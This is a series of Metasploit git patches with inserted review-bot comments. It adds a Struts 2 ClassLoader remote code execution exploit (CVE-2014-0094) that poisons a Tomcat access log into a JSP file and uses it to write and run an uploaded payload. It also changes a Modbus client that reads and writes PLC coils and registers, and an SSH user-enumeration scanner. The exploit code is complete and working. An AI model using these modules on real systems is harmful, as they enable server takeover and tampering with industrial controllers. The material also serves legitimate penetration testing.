+ sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length + chunk_length = 2048 - sub_from_chunk + chunk_length = ((chunk_length/4).floor)*3 + while pl_exe.length > chunk_length + java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) + pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] + append = true + end + java_upload_part(pl_exe,@payload_exe,append) + execute_command(chmod_cmd) if target['Platform'] == 'linux' + execute_command(exec_cmd) + register_files_for_cleanup(@payload_exe) +=end + + execute_command("a") + + end + + def java_upload_part(part, filename, append = 'false') + cmd = "" + cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," + cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," + cmd << "#f.close()" + execute_command(cmd) + end + + def check + sleep_time = datastore['CHECK_SLEEPTIME'] + check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" + t1 = Time.now + vprint_status("Asking remote server to sleep for #{sleep_time} seconds") + response = execute_command(check_cmd) + t2 = Time.now + delta = t2 - t1 + + + if response.nil? + return Exploit::CheckCode::Safe + elsif delta < sleep_time + return Exploit::CheckCode::Safe + else + return Exploit::CheckCode::Appears + end + end + +end + From a78aae08cf3a24a50f970ddfee7a4c14ee94a373 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Tue, 29 Apr 2014 03:58:04 +0200 Subject: [PATCH 197/853] Add CVE-2014-0094 RCE for Struts 2 --- .../http/struts_code_exec_classloader.rb | 232 +++++------------- 1 file changed, 66 insertions(+), 166 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 32331e4400..d6f11c9fac 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb 
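Review bot: The metadata in `initialize` describes a different issue from the one the commit subject names: 'Name', 'Description', 'Author', 'References' (`[ 'CVE', '2011-3923']`, S2-009) and 'DisclosureDate' all belong to the ParametersInterceptor OGNL bug, while the live requests in `execute_command` set `class['classLoader']` properties. Anyone matching this module to an advisory, or writing detection from its references, is pointed at the wrong CVE, so the reference should read `[ 'CVE', '2014-0094']` before this lands. `check` is also a leftover: it times `execute_command(check_cmd)`, but the live body never uses `cmd`, so the verdict depends only on how long the fixed requests take; `return Exploit::CheckCode::Unknown` would be honest until a real check exists. The two `=begin`/`=end` blocks are dead code and should be deleted rather than committed.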
@@ -14,28 +14,26 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution', + 'Name' => 'Apache Struts ClassLoader Manipulation Remote Code Execution', 'Description' => %q{ This module exploits a remote command execution vulnerability in Apache Struts - versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows - for the use of parentheses which in turn allows it to interpret parameter values as - OGNL expressions during certain exception handling for mismatched data types of - properties which allows remote attackers to execute arbitrary Java code via a - crafted parameter. + versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows + access to 'class' parameter which is directly mapped to getClass() method and + allows ClassLoader manipulation, which allows remote attackers to execute arbitrary + Java code via crafted parameters. }, 'Author' => [ - 'Meder Kydyraliev', # Vulnerability Discovery and PoC - 'Richard Hicks ', # Metasploit Module - 'mihi' #ARCH_JAVA support + 'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery + 'Alvaro Munoz', # PoC + 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', '2011-3923'], - [ 'OSVDB', '78501'], - [ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'], - [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009'] + [ 'CVE', '2014-0094'], + [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], + [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], 'Platform' => %w{ java linux win }, 'Privileged' => true, 
@@ -60,184 +58,86 @@ class Metasploit3 < Msf::Exploit::Remote }, ] ], - 'DisclosureDate' => 'Oct 01 2011', + 'DisclosureDate' => 'Mar 06 2014', 'DefaultTarget' => 2)) register_options( [ Opt::RPORT(8080), - OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]), - OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/hello_world/hello.action?INJECT"]), - OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]) + OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"]) ], self.class) end - def execute_command(cmd, opts = {}) -=begin - inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]" - inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true" - inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER'])) - inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd)) - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - uri.gsub!(/INJECT/,inject) # append the injection string + + def exec_cmd(uri, cmd = "") resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - return resp #Used for check function. 
-=end - - inject = "class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, + 'uri' => uri+cmd, 'version' => '1.1', 'method' => 'GET', }) - - inject = "class['classLoader'].resources.context.parent.pipeline.first.prefix=shell" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - inject = "class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - inject = "class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=1" - uri = String.new(datastore['TARGETURI']) - uri = normalize_uri(uri) - - uri.gsub!(/INJECT/,inject) # append the injection string - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - - uri = "/hello_world/echo.jsp?a=<% Runtime.getRuntime().exec("/usr/bin/gnome-terminal"); %>" - uri = normalize_uri(uri) - - - resp = send_request_cgi({ - 'uri' => uri, - 'version' => '1.1', - 'method' => 'GET', - }) - - - - return resp + end + + def peer + "#{rhost}:#{rport}" end def exploit -=begin - #Set up generic values. - @payload_exe = rand_text_alphanumeric(4+rand(4)) - pl_exe = generate_payload_exe - append = 'false' - #Now arch specific... 
- case target['Platform'] - when 'linux' - @payload_exe = "/tmp/#{@payload_exe}" - chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))" - exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))" - when 'java' - @payload_exe << ".jar" - pl_exe = payload.encoded_jar.pack - exec_cmd = "" - exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked')," - exec_cmd << "#q.setAccessible(true),#q.set(null,true)," - exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15')," - exec_cmd << "#q.setAccessible(true),#q.set(null,false)," - exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()})," - exec_cmd << "#c=#cl.loadClass('metasploit.Payload')," - exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke(" - exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})" - when 'windows' - @payload_exe = "./#{@payload_exe}.exe" - exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')" - else - fail_with(Failure::NoTarget, 'Unsupported target platform!') - end - #Now with all the arch specific stuff set, perform the upload. - #109 = length of command string plus the max length of append. 
- sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length - chunk_length = 2048 - sub_from_chunk - chunk_length = ((chunk_length/4).floor)*3 - while pl_exe.length > chunk_length - java_upload_part(pl_exe[0,chunk_length],@payload_exe,append) - pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length] - append = true - end - java_upload_part(pl_exe,@payload_exe,append) - execute_command(chmod_cmd) if target['Platform'] == 'linux' - execute_command(exec_cmd) - register_files_for_cleanup(@payload_exe) -=end + prefix_jsp = rand_text_alphanumeric(3+rand(3)) + date_format = rand_text_numeric(1+rand(4)) - execute_command("a") + vprint_status("#{peer} - Modifying class loader") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") - end + jsp_file = prefix_jsp + jsp_file << date_format + jsp_file << ".jsp" - def java_upload_part(part, filename, append = 'false') - cmd = "" - cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append})," - cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}'))," - cmd << "#f.close()" - execute_command(cmd) - end + vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") - def check - sleep_time = datastore['CHECK_SLEEPTIME'] - check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})" - t1 = Time.now - vprint_status("Asking remote server to sleep for #{sleep_time} seconds") - response = execute_command(check_cmd) - t2 = Time.now - delta = t2 - t1 + sleep(3) + + uri = String.new(datastore['TARGETURI']) + 
uri << rand_text_alphanumeric(4+rand(4)) + uri << "?" + uri << rand_text_alphanumeric(1+rand(1)) + uri << "=" - if response.nil? - return Exploit::CheckCode::Safe - elsif delta < sleep_time - return Exploit::CheckCode::Safe - else - return Exploit::CheckCode::Appears - end + payload_exe = generate_payload_exe + + payload_file = rand_text_alphanumeric(4+rand(4)) + register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + + exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") + exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>") + exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") + + exec_cmd(uri, "<% FileOutputStream oFile = new FileOutputStream(\"#{payload_file}\", false); %>") + exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") + exec_cmd(uri, "<% oFile.flush(); %>") + exec_cmd(uri, "<% oFile.close(); %>") + exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") + exec_cmd(uri, "<% f.setExecutable(true); %>") + exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + + vprint_status("#{peer} - Waiting 10 seconds...") + + sleep(10) + + vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") + + uri = "/" + uri << jsp_file + + exec_cmd(uri) + end end From b2c2245aff0eba40a98ebda7db67c97271d6cfcc Mon Sep 17 00:00:00 2001 From: julianvilas Date: Tue, 29 Apr 2014 11:24:17 +0200 Subject: [PATCH 198/853] Add comments --- .../multi/http/struts_code_exec_classloader.rb | 13 +++++++++---- 1 file changed, 9 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index d6f11c9fac..8d3743e644 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb 
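Review bot: `exploit` changes four `class['classLoader'].resources.context.parent.pipeline.first.*` properties on the target, and nothing in the new code restores them or tells the operator that they stay changed; `register_files_for_cleanup` covers only `payload_file` and `jsp_file`. The 'Description' and a comment above the four `exec_cmd` calls should say so, for example `# NOTE: directory/prefix/suffix/fileDateFormat remain modified on the target after the module finishes`, so whoever cleans up after a test knows the server needs resetting. Every caller of `exec_cmd` ignores the response, so the `created file at` status line is an assumption rather than an observation; `expected file at` would be accurate. The hard-coded `sleep(3)` and `sleep(10)` should each get a comment giving the reason for the delay.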
@@ -90,10 +90,12 @@ class Metasploit3 < Msf::Exploit::Remote date_format = rand_text_numeric(1+rand(4)) vprint_status("#{peer} - Modifying class loader") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") - exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") + + # Modifies classLoader parameters + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.directory=webapps/ROOT") # Directory where log file os going to be created + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.prefix=#{prefix_jsp}") # Filename + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.suffix=.jsp") # File extension + exec_cmd("#{datastore['TARGETURI']}?class['classLoader'].resources.context.parent.pipeline.first.fileDateFormat=#{date_format}") # second part of filename: "prefix+fileDateFormat.suffix" jsp_file = prefix_jsp jsp_file << date_format @@ -103,6 +105,7 @@ class Metasploit3 < Msf::Exploit::Remote sleep(3) + # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) uri << rand_text_alphanumeric(4+rand(4)) uri << "?" @@ -115,6 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_file = rand_text_alphanumeric(4+rand(4)) register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + # Commands to be logged exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") exec_cmd(uri, "<%@ page import=\"sun.misc.BASE64Decoder\" %>") exec_cmd(uri, "<%@ page import=\"java.io.File\" %>") 
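Review bot: Two of the added comments have wording slips: `# Directory where log file os going to be created` should read `is going`, and in the second hunk `# Inexistent URI that logs on previously created log file` reads better as `# Nonexistent URI, requested so that it is written to the log file created above`. The four trailing comments in the first hunk also push already long `exec_cmd` lines further right; placing each comment on its own line above the call keeps them readable.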
@@ -133,6 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") + # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences uri = "/" uri << jsp_file From 04f2632972932e4ed92980b96988daae75763586 Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Tue, 29 Apr 2014 16:09:47 +0200 Subject: [PATCH 199/853] Implement jvazquez-r7 comments --- .../auxiliary/scanner/scada/modbusclient.rb | 81 +++++++++---------- 1 file changed, 38 insertions(+), 43 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index e5b2bf0f2d..c2620e4a37 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb 
@@ -8,47 +8,42 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp - include Rex::Socket::Tcp def initialize(info = {}) super(update_info(info, - 'Name' => 'Modbus client, reloaded.', + 'Name' => 'Modbus Client Utility', 'Description' => %q{ This module allows reading and writing data to a PLC using the Modbus protocol. - This module is based on the 'modiconstop.rb' Basecamp module from DigitalBond, as well as the mbtget perl script. }, 'Author' => [ - 'EsMnemon ', # original write-only module - 'Arnaud SOULLIE ', # new code that allows read/write + 'EsMnemon ', # original write-only module + 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, + 'Actions' => [AuxiliaryAction.new('READ_COIL', {}), + AuxiliaryAction.new('WRITE_COIL', {}), + AuxiliaryAction.new('READ_REGISTER', {}), + AuxiliaryAction.new('WRITE_REGISTER', {}) + ] )) register_options( [ - OptEnum.new("MODE", [true, 'Command', "READ_REGISTER", - [ - "READ_REGISTER", - "READ_COIL", - "WRITE_REGISTER", - "WRITE_COIL" - ] - ]), Opt::RPORT(502), - OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)", 0xBEEF]), - OptInt.new('DATA_ADDRESS', [true, "Modbus data address", 0]), + OptInt.new('DATA', [false, "Data to write (WRITE_COIL and WRITE_REGISTER modes only)"]), + OptInt.new('DATA_ADDRESS', [true, "Modbus data address"]), OptInt.new('UNIT_NUMBER', [false, "Modbus unit number", 1]), ], self.class) end # a wrapper just to be sure we increment the counter - def sendframe(payload) + def send_frame(payload) sock.put(payload) - @modbuscounter += 1 - r = sock.recv(65535, 0.1) + @modbus_counter += 1 + r = sock.get return r end 
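Review bot: The removed `MODE` option defaulted to `READ_REGISTER`, but the new 'Actions' list has no 'DefaultAction', so a run where ACTION was never set would presumably fall through to the `else` branch of `run` and print `Invalid ACTION`. Adding `'DefaultAction' => 'READ_REGISTER'` next to 'Actions' keeps the old behaviour. The defaults for `DATA` and `DATA_ADDRESS` are dropped in the same hunk; `DATA_ADDRESS` is required, so the framework will insist on a value, but `DATA` is optional and the write branches should reject a missing value explicitly. Those checks are outside this hunk, so confirm that they handle `nil`.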
@@ -59,13 +54,13 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [1].pack("n") - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def make_write_coil_payload(data) @@ -76,13 +71,13 @@ class Metasploit3 < Msf::Auxiliary payload += [data].pack("c") payload += "\x00" - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def make_write_register_payload(data) 
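Review bot: The renamed builders keep the comment `#dunno what these are` on the `"\x00\x00\x00"` bytes, which leaves the frame layout undocumented. In Modbus/TCP the header after the two-byte transaction id is a two-byte protocol identifier (0) and a two-byte length, so these three bytes look like the protocol id plus the high byte of the length, with `[payload.size].pack("c")` supplying the low byte. A comment such as `# protocol id 0x0000 + high byte of the length field` would record that. `pack("c")` is a signed char, so `pack("C")` states the intent better, although the payloads built here are only a few bytes long. The same lines appear in `make_write_coil_payload` in the second hunk and in `make_write_register_payload` in the following one, and each builder starts outside its hunk.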
@@ -92,27 +87,27 @@ class Metasploit3 < Msf::Auxiliary payload += [datastore['DATA_ADDRESS']].pack("n") payload += [data].pack("n") - packetdata = "" - packetdata += [@modbuscounter].pack("n") - packetdata += "\x00\x00\x00" #dunno what these are - packetdata += [payload.size].pack("c") # size byte - packetdata += payload + packet_data = "" + packet_data += [@modbus_counter].pack("n") + packet_data += "\x00\x00\x00" #dunno what these are + packet_data += [payload.size].pack("c") # size byte + packet_data += payload - return packetdata + return packet_data end def run - @modbuscounter = 0x0000 # used for modbus frames + @modbus_counter = 0x0000 # used for modbus frames connect - case datastore['MODE'] + case datastore['ACTION'] when "READ_COIL" @function_code = 1 - response = sendframe(make_read_payload) + response = send_frame(make_read_payload) print_good("Coil value at address #{datastore['DATA_ADDRESS']} : " + response.reverse.unpack("c").to_s.gsub('[', '').gsub(']', '')) when "READ_REGISTER" @function_code = 3 - response = sendframe(make_read_payload) + response = send_frame(make_read_payload) value = response.split[0][9..10].to_s.unpack("n").to_s.gsub('[', '').gsub(']','') print_good("Register value at address #{datastore['DATA_ADDRESS']} : " + value) @@ -126,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary print_error("Data value must be 0 or 1 in WRITE_COIL mode") exit end - response = sendframe(make_write_coil_payload(data)) + response = send_frame(make_write_coil_payload(data)) print_good("Value #{datastore['DATA']} successfully written at coil address #{datastore['DATA_ADDRESS']}") when "WRITE_REGISTER" 
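Review bot: `run` uses whatever `send_frame` returns without checking it: the READ branches call `response.reverse` and `response.split` directly, and the WRITE branches print `successfully written` without looking at `response` at all. If `sock.get` returns `nil` on a timeout (likely, to be confirmed), the reads raise NoMethodError, and a Modbus exception reply is reported as success, which is misleading for a tool that changes PLC state. A guard such as `return print_error("No answer from PLC") if response.nil?` after each `send_frame` call, plus a comparison of the returned function code with `@function_code`, would cover both. The `exit` calls kept as context in the WRITE branches here and in the following hunk should be `return`, since `exit` can end the whole console rather than just the module. `run` continues beyond these hunks.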
@@ -135,11 +130,11 @@ class Metasploit3 < Msf::Auxiliary print_error("Data to write must be an integer between 0 and 65535 in WRITE_REGISTER mode") exit end - response = sendframe(make_write_register_payload(datastore['DATA'])) + response = send_frame(make_write_register_payload(datastore['DATA'])) print_good("Value #{datastore['DATA']} successfully written at registry address #{datastore['DATA_ADDRESS']}") else - print_error("Invalid MODE") + print_error("Invalid ACTION") return end end From e386855e0ef99c8fa4efab45a0887578723321fb Mon Sep 17 00:00:00 2001 From: Arnaud SOULLIE Date: Tue, 29 Apr 2014 16:55:05 +0200 Subject: [PATCH 200/853] Add ACTIONS descriptions --- modules/auxiliary/scanner/scada/modbusclient.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/scanner/scada/modbusclient.rb b/modules/auxiliary/scanner/scada/modbusclient.rb index c2620e4a37..cc630539df 100644 --- a/modules/auxiliary/scanner/scada/modbusclient.rb +++ b/modules/auxiliary/scanner/scada/modbusclient.rb @@ -23,10 +23,10 @@ class Metasploit3 < Msf::Auxiliary 'Arnaud SOULLIE ' # new code that allows read/write ], 'License' => MSF_LICENSE, - 'Actions' => [AuxiliaryAction.new('READ_COIL', {}), - AuxiliaryAction.new('WRITE_COIL', {}), - AuxiliaryAction.new('READ_REGISTER', {}), - AuxiliaryAction.new('WRITE_REGISTER', {}) + 'Actions' => [AuxiliaryAction.new('READ_COIL', {'Description' => "Read one bit from a coil"}), + AuxiliaryAction.new('WRITE_COIL', {'Description' => "Write one bit to a coil"}), + AuxiliaryAction.new('READ_REGISTER', {'Description' => "Read one word from a register"}), + AuxiliaryAction.new('WRITE_REGISTER', {'Description' => "Write one word to a register"}) ] )) register_options( From 88efeea378bc86cbecd5b9c5910c359bc9e39daa Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Tue, 29 Apr 2014 16:07:42 +0100 Subject: [PATCH 201/853] Add a false positive check --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index c3f0b591d4..04e18c4fd8 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -69,6 +69,13 @@ class Metasploit3 < Msf::Auxiliary datastore['THRESHOLD'] end + # Returns true if a nonsense username appears active. + def check_false_positive(ip) + user = Rex::Text.rand_text_alphanumeric(16) + result = attempt_user(user, ip) + return(result == :success) + end + def check_user(ip, user, port) pass = Rex::Text.rand_text_alphanumeric(64_000) @@ -164,7 +171,13 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) print_status "#{peer(ip)} Starting scan" - user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + print_status "#{peer(ip)} Checking for false positives" + if check_false_positive(ip) + print_error "#{peer(ip)} throws false positive results. Aborting." + return + else + user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } + end end end From a5983b5f573fe9eddf6f0faa59b193542501253c Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Tue, 29 Apr 2014 16:14:41 +0100 Subject: [PATCH 202/853] Light touchup on FP checker --- modules/auxiliary/scanner/ssh/ssh_enumusers.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 04e18c4fd8..6936ec3c07 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb 
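Review bot: `check_false_positive` treats every result other than `:success` as "no false positive", so if `attempt_user` can return a connection or timeout result (its body is outside the hunk), an unreachable host passes the check and `run_host` works through the whole user list against it. Checking the probe result explicitly, and aborting unless it is the value the module uses for "user not found", avoids that. On style, `return(result == :success)` can be just `attempt_user(user, ip) == :success` as the last expression. The `else` after `return` in `run_host` is redundant; a guard clause that returns when `check_false_positive(ip)` is true reads flatter.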
@@ -71,7 +71,7 @@ class Metasploit3 < Msf::Auxiliary # Returns true if a nonsense username appears active. def check_false_positive(ip) - user = Rex::Text.rand_text_alphanumeric(16) + user = Rex::Text.rand_text_alphanumeric(8) result = attempt_user(user, ip) return(result == :success) end @@ -170,12 +170,12 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - print_status "#{peer(ip)} Starting scan" print_status "#{peer(ip)} Checking for false positives" if check_false_positive(ip) print_error "#{peer(ip)} throws false positive results. Aborting." return else + print_status "#{peer(ip)} Starting scan" user_list.each{ |user| show_result(attempt_user(user, ip), user, ip) } end end From 8e8fbfe583622f5e60be68b7e317838d980545f6 Mon Sep 17 00:00:00 2001 From: julianvilas Date: Tue, 29 Apr 2014 17:36:04 +0200 Subject: [PATCH 203/853] Fix msf-staff comments --- .../multi/http/struts_code_exec_classloader.rb | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 8d3743e644..7f040386e1 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -24,8 +24,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Mark Thomas and Przemyslaw Celej', # Vulnerability Discovery - 'Alvaro Munoz', # PoC + 'Mark Thomas', # Vulnerability Discovery + 'Przemyslaw Celej', # Vulnerability Discovery + 'pwntester ', # PoC 'Redsadic ' # Metasploit Module ], 'License' => MSF_LICENSE, @@ -80,10 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote end - def peer - "#{rhost}:#{rport}" - end - def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) 
@@ -103,9 +100,9 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") - sleep(3) + Rex.sleep(3) - # Inexistent URI that logs on previously created log file (with ".jsp" suffix) + # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) uri << rand_text_alphanumeric(4+rand(4)) uri << "?" @@ -133,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("#{peer} - Waiting 10 seconds...") - sleep(10) + Rex.sleep(10) vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") From 55d8be8238742b2816a711611c7ad1968fb72b9b Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 22:55:14 +0100 Subject: [PATCH 204/853] Add cve-2013-4074 module to crash dissector capwap --- .../windows/misc/wireshark_capwap_dos.rb | 67 +++++++++++++++++++ 1 file changed, 67 insertions(+) create mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb new file mode 100644 index 0000000000..818d62692a --- /dev/null +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb 
